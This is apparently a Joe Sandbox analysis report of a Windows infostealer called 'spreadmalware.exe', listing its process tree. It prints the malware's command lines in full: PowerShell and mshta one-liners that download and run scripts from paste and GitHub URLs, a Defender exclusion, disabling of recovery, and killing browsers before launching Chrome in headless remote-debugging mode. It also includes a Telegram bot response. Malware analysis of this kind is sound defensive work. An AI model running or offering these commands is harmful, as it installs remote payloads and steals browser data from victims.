2025-01-08 09:16:51 UTC	476	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 38 37 34 31 38 33 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 68 61 69 31 37 32 33 5f 66 69 6c 65 5f 68 65 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 61 69 31 37 32 33 5f 66 69 6c 65 5f 68 65 72 65 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 30 35 36 31 37 34 35 34 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 79 6e 61 6d 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4e 61 6d 65 4d 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 6e 6f 74 6e 69 67 67 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 Data Ascii: {"ok":true,"result":{"message_id":92,"from":{"id":7487418347,"is_bot":true,"first_name":"hai1723_file_here","username":"hai1723_file_here_bot"},"chat":{"id":7056174540,"first_name":"Myname","last_name":"NameMy","username":"inotnigga","type":"private"},"da

Target ID:	1
Start time:	04:14:59
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\spreadmalware.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\spreadmalware.exe"
Imagebase:	0x680000
File size:	62'976 bytes
MD5 hash:	3437A2105A9740AD94B06F04378BB5B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	04:15:04
Start date:	08/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg \| iex"
Imagebase:	0x7ff71d220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	04:15:10
Start date:	08/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" "
Imagebase:	0x7ff71d220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	04:15:11
Start date:	08/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo \\user-PC "
Imagebase:	0x7ff71d220000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	20
Start time:	04:15:16
Start date:	08/01/2025
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Imagebase:	0x7ff78a960000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	04:15:17
Start date:	08/01/2025
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Imagebase:	0x7ff78a960000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	04:15:18
Start date:	08/01/2025
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat"
Imagebase:	0x7ff78a960000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	04:15:19
Start date:	08/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff745410000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	24
Start time:	04:15:20
Start date:	08/01/2025
Path:	C:\Windows\System32\doskey.exe
Wow64 process (32bit):	false
Commandline:	doskey /listsize=0
Imagebase:	0x7ff714cc0000
File size:	20'480 bytes
MD5 hash:	F6D134052BCB12103B729E4D2EA15B91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	04:15:21
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') \| iex""",0)(window.close)
Imagebase:	0x7ff6b4420000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	05:51:50
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline"
Imagebase:	0x7ff65a720000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	05:51:54
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta.exe vbscript:createobject("wscript.shell").run("powershell iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex",0)(window.close)
Imagebase:	0x7ff6b4420000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	05:51:55
Start date:	08/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Imagebase:	0x7ff68f4c0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	43
Start time:	05:51:57
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	44
Start time:	05:51:59
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline"
Imagebase:	0x7ff65a720000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	46
Start time:	05:52:04
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	48
Start time:	05:52:05
Start date:	08/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
Imagebase:	0x7ff68f4c0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	49
Start time:	05:52:06
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing'))
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	55
Start time:	05:52:08
Start date:	08/01/2025
Path:	C:\Windows\System32\ReAgentc.exe
Wow64 process (32bit):	false
Commandline:	reagentc.exe /disable
Imagebase:	0x7ff7760a0000
File size:	44'544 bytes
MD5 hash:	A109CC3B919C7D40E4114966340F39E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	57
Start time:	05:52:09
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM firefox.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	59
Start time:	05:52:10
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM opera.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report spreadmalware.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spreadmalware.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\error[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\error[1]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES8ECC.tmp

C:\Users\user\AppData\Local\Temp\RESB485.tmp

Windows Analysis Report
spreadmalware.exe

Target ID:	60
Start time:	05:52:11
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM kometa.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	64
Start time:	05:52:12
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM centbrowser.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	65
Start time:	05:52:13
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM 7star.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	67
Start time:	05:52:14
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM vivaldi.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	70
Start time:	05:52:15
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM uran.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	71
Start time:	05:52:16
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM yandex.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	74
Start time:	05:52:17
Start date:	08/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	78
Start time:	05:52:19
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM firefox.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	79
Start time:	05:52:20
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM brave.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	81
Start time:	05:52:21
Start date:	08/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM kometa.exe
Imagebase:	0x7ff6c59a0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true